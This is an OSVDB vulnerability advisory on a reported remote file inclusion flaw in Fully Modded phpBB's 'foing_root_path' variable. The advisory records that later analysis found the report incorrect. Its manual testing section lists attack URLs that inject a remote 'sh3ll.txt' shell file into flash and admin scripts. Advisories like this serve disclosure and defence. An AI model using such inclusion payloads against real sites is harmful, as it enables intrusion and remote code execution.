Fully Modded phpBB Multiple Script foing_root_path Variable Remote File Inclusion

2006-10-23T18:03:50
ID OSVDB:30035
Type osvdb
Reporter 020()
Modified 2006-10-23T18:03:50

Description

Vulnerability Description

Fully Modded phpBB has been reported to contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is supposedly due to multiple scripts in the /flash/ and /admin/ directory not properly sanitizing user input supplied to the 'foing_root_path' variable. However, subsquent analysis by CVE indicates that these scripts set the value before being used so that an attacker could not manipulate the content.

Solution Description

The vulnerability reported is incorrect. No solution required.

Short Description

Fully Modded phpBB has been reported to contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is supposedly due to multiple scripts in the /flash/ and /admin/ directory not properly sanitizing user input supplied to the 'foing_root_path' variable. However, subsquent analysis by CVE indicates that these scripts set the value before being used so that an attacker could not manipulate the content.

Manual Testing Notes

http://[target]/[player]/flash/set_na.php?foing_root_path=sh3ll.txt? http://[target]/[player]/flash/initialise.php?foing_root_path=sh3ll.txt? http://[target]/[player]/flash/get_song.php?foing_root_path=sh3ll.txt?

http://[target]/[player]/admin/nav.php?foing_root_path=sh3ll.txt? http://[target]/[player]/admin/main.php?foing_root_path=sh3ll.txt? http://[target]/[player]/admin/list_artists.php?foing_root_path=sh3ll.txt? http://[target]/[player]/admin/index.php?foing_root_path=sh3ll.txt? http://[target]/[player]/admin/genres.php?foing_root_path=sh3ll.txt? http://[target]/[player]/admin/edit_artist.php?foing_root_path=sh3ll.txt? http://[target]/[player]/admin/edit_album.php?foing_root_path=sh3ll.txt? http://[target]/[player]/admin/config.php?foing_root_path=sh3ll.txt? http://[target]/[player]/admin/admin_status.php?foing_root_path=sh3ll.txt?

References:

Vendor URL: http://phpbbfm.net/ Secunia Advisory ID:22499 ISS X-Force ID: 29718 Generic Exploit URL: http://milw0rm.com/exploits/2621 FrSIRT Advisory: ADV-2006-4165 CVE-2006-5526